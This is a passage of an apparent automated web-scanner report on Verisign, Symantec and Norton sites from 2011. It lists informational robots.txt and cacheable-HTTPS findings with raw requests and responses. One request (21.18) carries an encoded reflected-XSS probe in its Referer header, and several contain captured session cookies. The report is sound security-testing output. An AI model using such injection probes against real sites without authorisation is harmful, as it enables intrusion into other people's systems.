HTTP/1.1 200 OK Connection: close Date: Fri, 09 Sep 2011 21:46:49 GMT Content-Length: 26 Content-Type: text/plain User-agent: * Disallow: /
20.37. https://trust-center.verisign.ch/process/retail/trust_initial
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.ch
Path:
/process/retail/trust_initial
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: trust-center.verisign.ch
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:48 GMT Server: Apache Set-Cookie: TLTHID=3836F65ADB2D10DB68D2A5440567C536; Path=/; Domain=.verisign.ch Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Content-Length: 26 Vary: Accept-Encoding Connection: close Content-Type: text/plain User-agent: * Disallow: /
20.38. https://trust-center.verisign.com/process/retail/trust_initial
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/process/retail/trust_initial
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: trust-center.verisign.com
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:34 GMT Server: Apache Set-Cookie: TLTHID=6477053CDB2A10DB6A74CEC4D1E75D2A; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Content-Length: 26 Vary: Accept-Encoding Connection: close Content-Type: text/plain User-agent: * Disallow: /
20.39. http://twitter.com/statuses/user_timeline/pctools.json
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://twitter.com
Path:
/statuses/user_timeline/pctools.json
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: twitter.com
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 22:05:29 GMT Server: Apache Last-Modified: Tue, 06 Sep 2011 18:09:12 GMT Accept-Ranges: bytes Content-Length: 519 Cache-Control: max-age=86400 Expires: Sat, 10 Sep 2011 22:05:29 GMT Vary: Accept-Encoding X-XSS-Protection: 1; mode=block Connection: close Content-Type: text/plain; charset=UTF-8 #Google Search Engine Robot User-agent: Googlebot # Crawl-delay: 10 -- Googlebot ignores crawl-delay ftl Allow: /*?*_escaped_fragment_ Disallow: /*? Disallow: /*/with_friends #Yahoo! Search Engine Ro...[SNIP]...
20.40. http://us.norton.com/index.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://us.norton.com
Path:
/index.jsp
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: us.norton.com
Response
HTTP/1.0 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Length: 534 Last-Modified: Thu, 29 Jul 2010 20:29:17 GMT ETag: "216-4c51e49d" Accept-Ranges: bytes Content-Type: text/plain Cache-Control: public, max-age=14760 Date: Fri, 09 Sep 2011 21:30:57 GMT Connection: close User-agent:* Disallow:/common/ Disallow:/content/ Disallow:/corp/ Disallow:/css/ Disallow:/ssi/ Disallow:/lib/ Disallow:/errors/ Disallow:/feedback/ Disallow:/media/ Disallow:/script/ Disal...[SNIP]...
20.41. https://us.norton.com/index.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://us.norton.com
Path:
/index.jsp
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: us.norton.com
Response
HTTP/1.0 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Length: 534 Last-Modified: Thu, 29 Jul 2010 20:29:17 GMT ETag: "216-4c51e49d" Accept-Ranges: bytes Content-Type: text/plain Cache-Control: public, max-age=21595 Date: Fri, 09 Sep 2011 21:47:34 GMT Connection: close User-agent:* Disallow:/common/ Disallow:/content/ Disallow:/corp/ Disallow:/css/ Disallow:/ssi/ Disallow:/lib/ Disallow:/errors/ Disallow:/feedback/ Disallow:/media/ Disallow:/script/ Disal...[SNIP]...
20.42. https://www-secure.symantec.com/feedback/webmaster.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www-secure.symantec.com
Path:
/feedback/webmaster.jsp
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: www-secure.symantec.com
Response
HTTP/1.0 200 OK Server: Sun-Java-System-Web-Server/7.0 Last-Modified: Fri, 09 Sep 2011 17:26:24 GMT ETag: "33-4e6a4c40" Content-Type: text/plain Cache-Control: public, max-age=8132 Date: Fri, 09 Sep 2011 21:47:33 GMT Content-Length: 51 Connection: close User-agent:* Disallow:/* Allow:/norton-support/
20.43. http://www.google-analytics.com/__utm.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.google-analytics.com
Path:
/__utm.gif
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: www.google-analytics.com
Response
HTTP/1.0 200 OK Vary: Accept-Encoding Content-Type: text/plain Last-Modified: Mon, 10 Jan 2011 11:53:04 GMT Date: Fri, 09 Sep 2011 21:25:58 GMT Expires: Fri, 09 Sep 2011 21:25:58 GMT Cache-Control: private, max-age=0 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 1; mode=block User-agent: * Disallow: /siteopt.js Disallow: /config.js
20.44. http://www.symantec.com/scripts/swfobject.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.symantec.com
Path:
/scripts/swfobject.js
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: www.symantec.com
Response
HTTP/1.0 200 OK Server: Sun-Java-System-Web-Server/7.0 Last-Modified: Wed, 18 May 2011 10:02:58 GMT ETag: "1147-4dd39952" Content-Type: text/plain Cache-Control: public, max-age=1476 Date: Fri, 09 Sep 2011 21:26:10 GMT Content-Length: 4423 Connection: close # Standard List User-agent: * Disallow: /common/ Disallow: /content/ Disallow: /corp/ Disallow: /css/ Disallow: /ssi/ Disallow: /lib/ Disallow: /errors/ Disallow: /feedback/ Disallow: /media...[SNIP]...
20.45. http://www.verisign.ch/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.ch
Path:
/
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: www.verisign.ch
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:12 GMT Server: Apache Last-Modified: Wed, 19 Jan 2011 20:21:58 GMT ETag: "2e58be0-5a-49a38c4d54580" Accept-Ranges: bytes Content-Length: 90 X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/plain User-Agent: * Disallow: /dm/ Disallow: /images/ Disallow: /Unlinked_Pages/ Disallow: /dev/
20.46. http://www.verisign.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.com
Path:
/
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: www.verisign.com
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:24:38 GMT Server: Apache Last-Modified: Wed, 19 Jan 2011 20:36:59 GMT Accept-Ranges: bytes Content-Length: 2539 Expires: Sun, 09 Oct 2011 21:24:38 GMT Connection: close Content-Type: text/plain User-Agent: * Disallow: /aol/ Disallow: /att/ Disallow: /authentic/ Disallow: /aventail/ Disallow: /b2b/ Disallow: /cd/ Disallow: /cdrom/ Disallow: /cgi-bin/ Disallow: /checkpoint/ Disallow: /client/...[SNIP]...
20.47. https://www.verisign.com/products/site/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.verisign.com
Path:
/products/site/
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: www.verisign.com
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:27:47 GMT Server: Apache Last-Modified: Wed, 19 Jan 2011 20:36:59 GMT Accept-Ranges: bytes Content-Length: 2539 Expires: Sun, 09 Oct 2011 21:27:47 GMT Connection: close Content-Type: text/plain User-Agent: * Disallow: /aol/ Disallow: /att/ Disallow: /authentic/ Disallow: /aventail/ Disallow: /b2b/ Disallow: /cd/ Disallow: /cdrom/ Disallow: /cgi-bin/ Disallow: /checkpoint/ Disallow: /client/...[SNIP]...
21. Cacheable HTTPS response
previous
next
There are 73 instances of this issue:
Issue description
Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.
Issue remediation
The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:Cache-control: no-store Pragma: no-cache
21.1. https://cdn.verisign.com/authweb/en_us/assets/shared/js/google-analytics.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://cdn.verisign.com
Path:
/authweb/en_us/assets/shared/js/google-analytics.js
Request
GET /authweb/en_us/assets/shared/js/google-analytics.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:52 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.13Cache-Control: max-age=2592000, public Age: 69191 Expires: Sun, 09 Oct 2011 02:25:41 GMT Content-Length: 461 var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-295855-1']); _gaq.push(['_setDomainName', '.verisign.com']); _gaq.push(['_trackPageview']); (function() { var ga = document.createElement('scr...[SNIP]...
21.2. https://cdn.verisign.com/authweb/global/assets/header/js/flyouts.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://cdn.verisign.com
Path:
/authweb/global/assets/header/js/flyouts.js
Request
GET /authweb/global/assets/header/js/flyouts.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:43 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.13Cache-Control: max-age=2592000, public Age: 13 Expires: Sun, 09 Oct 2011 21:38:30 GMT Content-Length: 8048 //----------------------------------------// // My Account M-flyout form functionality //----------------------------------------// $("#myacc_search_btn").click(function(){ //document.get...[SNIP]...
21.3. https://cdn.verisign.com/authweb/global/assets/header/js/header.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://cdn.verisign.com
Path:
/authweb/global/assets/header/js/header.js
Request
GET /authweb/global/assets/header/js/header.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:43 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.13Cache-Control: max-age=2592000, public Age: 13 Expires: Sun, 09 Oct 2011 21:38:30 GMT Content-Length: 1558 /******************************************* ** Header functions ** *******************************************/ //----------------------------------------// //Load Defaults when DOM i...[SNIP]...
21.4. https://cdn.verisign.com/authweb/global/assets/header/js/jquery.autocomplete.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://cdn.verisign.com
Path:
/authweb/global/assets/header/js/jquery.autocomplete.js
Request
GET /authweb/global/assets/header/js/jquery.autocomplete.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:44 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.13Cache-Control: max-age=2592000, public Age: 14 Expires: Sun, 09 Oct 2011 21:38:30 GMT Content-Length: 22148 /* * jQuery Autocomplete plugin 1.1 * * Copyright (c) 2009 J..rn Zaefferer * * Dual licensed under the MIT and GPL licenses: * http://www.opensource.org/licenses/mit-license.php * ht...[SNIP]...
21.5. https://cdn.verisign.com/authweb/global/assets/home/js/home.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://cdn.verisign.com
Path:
/authweb/global/assets/home/js/home.js
Request
GET /authweb/global/assets/home/js/home.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:48 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.13Cache-Control: max-age=2592000, public Age: 16 Expires: Sun, 09 Oct 2011 21:38:32 GMT Content-Length: 2725 /******************************************* ** HP specific functions ** *******************************************/ //External link functionality $('a[rel="external"]').click(funct...[SNIP]...
21.6. https://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://cdn.verisign.com
Path:
/authweb/global/assets/shared/js/global-preload.js
Request
GET /authweb/global/assets/shared/js/global-preload.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:28 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.13Cache-Control: max-age=2592000, public Age: 69230 Expires: Sun, 09 Oct 2011 02:24:38 GMT Content-Length: 135518 // FROM: https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.js /*! * jQuery JavaScript Library v1.4.4 * http://jquery.com/ * * Copyright 2010, John Resig * Dual licensed under the M...[SNIP]...
21.7. https://cdn.verisign.com/authweb/global/assets/shared/js/google-analytics.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://cdn.verisign.com
Path:
/authweb/global/assets/shared/js/google-analytics.js
Request
GET /authweb/global/assets/shared/js/google-analytics.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:28 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.13Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:38:28 GMT Content-Length: 471 var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-295855-1']); _gaq.push(['_setDomainName', '.verisign.com']); _gaq.push(['_trackPageview']); (function() { var ga = document.createElemen...[SNIP]...
21.8. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.boxshadow.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://cdn.verisign.com
Path:
/authweb/global/assets/shared/js/jquery.boxshadow.js
Request
GET /authweb/global/assets/shared/js/jquery.boxshadow.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:28 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.13Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:38:27 GMT Content-Length: 1538 /* ** * jquery-boxshadow.js * * $(object).boxshadow({ * hOffset : 3, * vOffset : 3, * shadowblur : 3, * color : '#808080' * }) * * If you are using this with IE, you should s...[SNIP]...
21.9. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://cdn.verisign.com
Path:
/authweb/global/assets/shared/js/jquery.cacheimage.js
Request
GET /authweb/global/assets/shared/js/jquery.cacheimage.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:27 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.13Cache-Control: max-age=2592000, public Age: 1 Expires: Sun, 09 Oct 2011 21:38:26 GMT Content-Length: 1356 /* * cacheImage: a jQuery plugin * * cacheImage is a simple jQuery plugin for pre-caching images. The * plugin can be used to eliminate flashes of unstyled content (FOUC) and * improve perceived...[SNIP]...
21.10. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://cdn.verisign.com
Path:
/authweb/global/assets/shared/js/jquery.hover_intent.js
Request
GET /authweb/global/assets/shared/js/jquery.hover_intent.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:28 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.13Cache-Control: max-age=2592000, public Age: 39037 Expires: Sun, 09 Oct 2011 10:47:51 GMT Content-Length: 1614 /** * hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+ * <http://cherne.net/brian/resources/jquery.hoverIntent.html> * * @param f onMouseOver function || An object with configuration options * @p...[SNIP]...
21.11. https://cdn.verisign.com/authweb/global/assets/shared/js/oo-engine.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://cdn.verisign.com
Path:
/authweb/global/assets/shared/js/oo-engine.js
Request
GET /authweb/global/assets/shared/js/oo-engine.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:28 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.13Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:38:28 GMT Content-Length: 1154 /* OnlineOpinion (S3tS v3.1) */ /* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. 6606581, 6421724, 6785717 B1 and other patents pending. */ var custom_var,...[SNIP]...
21.12. https://cdn.verisign.com/authweb/global/assets/shared/js/rotator.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://cdn.verisign.com
Path:
/authweb/global/assets/shared/js/rotator.js
Request
GET /authweb/global/assets/shared/js/rotator.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:35 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.13Cache-Control: max-age=2592000, public Age: 77341 Expires: Sun, 09 Oct 2011 00:09:34 GMT Content-Length: 4102 var activeBannerId = ""; var activeBannerControllerId = ""; var activeTipId = ""; var rotate = true; var myBannerNumber = 1; var activeBannerNumber = myBannerNumber; var bannerItemsLength = $(...[SNIP]...
21.13. https://cdn.verisign.com/authweb/global/assets/shared/js/shared.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://cdn.verisign.com
Path:
/authweb/global/assets/shared/js/shared.js
Request
GET /authweb/global/assets/shared/js/shared.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:29 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.13Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:38:29 GMT Content-Length: 37327 // FROM: https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js /* * cacheImage: a jQuery plugin * * cacheImage is a simple jQuery plugin for pre-caching images. The * plug...[SNIP]...
21.14. https://cert.webtrust.org/ViewSeal
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://cert.webtrust.org
Path:
/ViewSeal
Request
GET /ViewSeal HTTP/1.1 Host: cert.webtrust.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 20:14:30 GMT Server: Apache Tomcat/4.0.6 (HTTP/1.1 Connector) X-Cache: MISS from cert.webtrust.org Connection: close Content-Type: text/html Content-Length: 2834 java.lang.NumberFormatException: null at java.lang.Integer.parseInt(Integer.java:394) at java.lang.Integer.parseInt(Integer.java:476) at ca.cica.servlets.WebContext.getFormInt(WebContext.java:29) ...[SNIP]...
21.15. https://fileconnect.symantec.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://fileconnect.symantec.com
Path:
/
Request
GET / HTTP/1.1 Host: fileconnect.symantec.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621927_PCT-1315622275_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_sq=%5B%5BB%5D%5D; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/12; s_pers=%20s_nr%3D1315622498618-New%7C1336358498618%3B%20event69%3Devent69%7C1336358498621%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20init_search%3Dxss%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520categories%2525253A%25252520security%2525252C%25252520backup%25252520%25252526%25252520archiving%2525252C%25252520server%25252520management%2525252C%25252520and%25252520storage%25252520software%25252520%2525257C%25252520symantec%25252520enterprise%25252520products%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%2526symantecstoresmb%252C%2520veritasnonconsumer%252C%2520symanteccom%253D%252526pid%25253Den%25252Fus%2525253ASMBStore%2525253ALRC%2525253AChat%25252520Form%252526pidt%25253D1%252526oid%25253Dmailto%2525253Asales%252540symantecsmbrenewals.com%252526ot%25253DA%3B; JSESSIONID=V38gTqNQLHyLm2TQTSMmQ38tfyv2QBbTyZ1rpHfBJgYXTJS8hLvS!1676143451
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Fri, 09 Sep 2011 22:04:07 GMT Content-length: 11587 Content-type: text/html Content-Language: en-US <HTML><HEAD><TITLE>Symantec FileConnect - Electronic Software Distribution</TITLE> <!--[if IE]> <LINK REL=StyleSheet HREF="javascript/stylesie.css" TYPE="text/css" MEDIA=screen> <![endif]...[SNIP]...
21.16. https://forms.verisign.com/websurveys/servlet/ActionMultiplexer
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://forms.verisign.com
Path:
/websurveys/servlet/ActionMultiplexer
Request
GET /websurveys/servlet/ActionMultiplexer HTTP/1.1 Host: forms.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 36 Date: Fri, 09 Sep 2011 21:41:07 GMT Missing or unknown action ID: null
21.17. https://idprotect.verisign.com/common/scripts/dlText.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://idprotect.verisign.com
Path:
/common/scripts/dlText.js
Request
GET /common/scripts/dlText.js HTTP/1.1 Host: idprotect.verisign.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://idprotect.verisign.com/orderstart.v Cookie: JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:50:57 GMT Accept-Ranges: bytes ETag: W/"19229-1310089722000" Last-Modified: Fri, 08 Jul 2011 01:48:42 GMT Content-Type: text/javascript Content-Length: 19229 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive linkData['DL_0'] = 'Supported Mobile Devices'; linkData['DL_1'] = 'Select Your Mobile Device'; linkData['DL_2'] = 'Why You Have To Download, Activate, and Register Your ' + brand_productname; linkData...[SNIP]...
21.18. https://idprotect.verisign.com/secureredirect.v
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://idprotect.verisign.com
Path:
/secureredirect.v
Request
GET /secureredirect.v?sid=0.08982152305543423 HTTP/1.1 Host: idprotect.verisign.com Connection: keep-alive Referer: https://idprotect.verisign.com/toolbar/home.v?141ab%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E41143d22db1=1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.11.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____; JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:51:44 GMT Content-Type: text/xml;charset=UTF-8 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Length: 2195 <?xml version="1.0" encoding="UTF-8"?><document><redirectUrl>https://vipmobile.verisign.com/welcome.v</redirectUrl><timestamp>2011-09-09T21:51:44Z</timestamp><cert>-----BEGIN CERTIFICATE----- MIIEVzCC...[SNIP]...
21.19. https://idprotect.verisign.com/toolbar/downloadIE.v
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://idprotect.verisign.com
Path:
/toolbar/downloadIE.v
Request
GET /toolbar/downloadIE.v HTTP/1.1 Host: idprotect.verisign.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://idprotect.verisign.com/toolbar/install.v Cookie: JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:47:40 GMT Content-disposition: filename="VIPAccessToolbarSetup.exe" Content-Type: application/octet-stream Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Length: 1936456 MZ......................@............................................. .!..L.!This program cannot be run in DOS mode. $........M4..,Z..,Z..,Z..0V..,Z.f3Q..,Z.0T..,Z.f3P..,Z.$...,Z..,[..,Z...Q..,Z....[SNIP]...
21.20. https://knowledge.verisign.ch/support/code-signing-support/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.ch
Path:
/support/code-signing-support/index.html
Request
GET /support/code-signing-support/index.html HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:43:01 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]...
21.21. https://knowledge.verisign.ch/support/digital-id-support/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.ch
Path:
/support/digital-id-support/index.html
Request
